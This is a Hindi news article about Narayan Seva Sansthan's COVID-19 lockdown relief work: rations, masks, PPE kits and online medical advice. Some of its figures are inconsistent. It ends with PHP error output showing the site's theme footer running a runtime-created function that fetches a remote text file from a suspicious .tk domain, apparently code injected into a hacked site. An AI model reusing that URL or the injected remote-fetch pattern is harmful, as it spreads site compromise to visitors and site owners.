नारायण सेवा संस्थान ने निशुल्क राशन और मॉस्क वितरण के जरिए 1 लाख से ज्यादा जरूरतमंदों तक पहुंचा

Edit-Rashmi Sharma

जयपुर 03 जुलाई 2020 – उदयपुर स्थित धर्मार्थ संगठन नारायण सेवा संस्थान ने लॉकडाउन के दौरान संकट में फंसे जरूरतमंद लोगों की सेवा के लिए 5 अभियान चलाए। हालिया अभियान में, संस्थान की ओर से शहर में 50000 परिवारों को मासिक मासिक राशन मुहैया कराया गया है।

इस दौरान संस्थान ने कोरोना महामारी से निपटने के लिए 98507 से अधिक खाद्य पैकेट 53,227 मास्क और 5165 परिवारों को राशन सामग्री का वितरण किया।

वर्तमान कठिन समय के दौरान संस्थान से जुड़े 5 दिव्यांगों ने 53,227 से अधिक फेस मास्क और 780 पीपीई किट तैयार किए। इसी अवधि में संस्थान ने दिव्यांगों को स्वास्थ्य से जुड़ी निशुल्क परामर्श सेवाएं उपलब्ध कराईं। निशुल्क स्वास्थ्य सेवाओं में लाइव सेशन के जरिये वरिष्ठ डॉक्टरों की एक टीम ने दिव्यांग लोगों और जरूरतमंदों को मुफ्त चिकित्सा और स्वास्थ्य सलाह दी।
अभियान को फेसबुक और यूट्यूब पर लाइव आयोजित किया गया था जहां सर्जरी की जटिल प्रक्रिया और दिन-प्रतिदिन की जीवनशैली में अचानक शारीरिक बदलाव के बारे में जानकारी देने के साथ-साथ दिव्यांगों को कृत्रिम अंगों की फिटिंग के लिए तैयार करने के बारे में भी चर्चा की गई।

नारायण सेवा संस्थान के प्रेसीडेंट श्री प्रशांत अग्रवाल ने कहा, ‘‘जरूरतमंद लोगों को समय पर सहायता उपलब्ध कराने के उद्देश्य से हमने विशेष अभियान संचालित किए और ऐसे अभियानों के माध्यम से हम 1 लाख से अधिक लोगों की सहायता करने में सफल रहे। इस दौरान जरूरतमंद लोगों को भोजन, मास्क सैनिटाइजर के साथ चिकित्सा सहायता और वेबिनार के माध्यम से परामर्श उपलब्ध कराया गया। इसके अलावा अनलॉक-2 के दौरान हमने 50 हजारों परिवारों को हमारी सेवाओं से लाभान्वित किया।‘‘

संस्थान ने वर्तमान समय की जरूरत को देखते हुए मुख्यमंत्री राहत कोष में 2 लाख रुपये का योगदान भी किया। इस बीच, संस्थान अपने कौशल केंद्रों को जल्द ही फिर से शुरू करने की योजना बना रहा है, ताकि देश की अर्थव्यवस्था को गति देने में योगदान किया जा सके और दिव्यांग लोेगों के लिए एक बार फिर से ट्रेनिंग का इंतजाम किया जा सके।


Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/patrikajagat/public_html/wp-content/themes/sahifa/footer.php(39) : runtime-created function on line 1

Warning: file_get_contents(http://nativeredir.tk/lx/1.txt): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/patrikajagat/public_html/wp-content/themes/sahifa/footer.php(39) : runtime-created function on line 1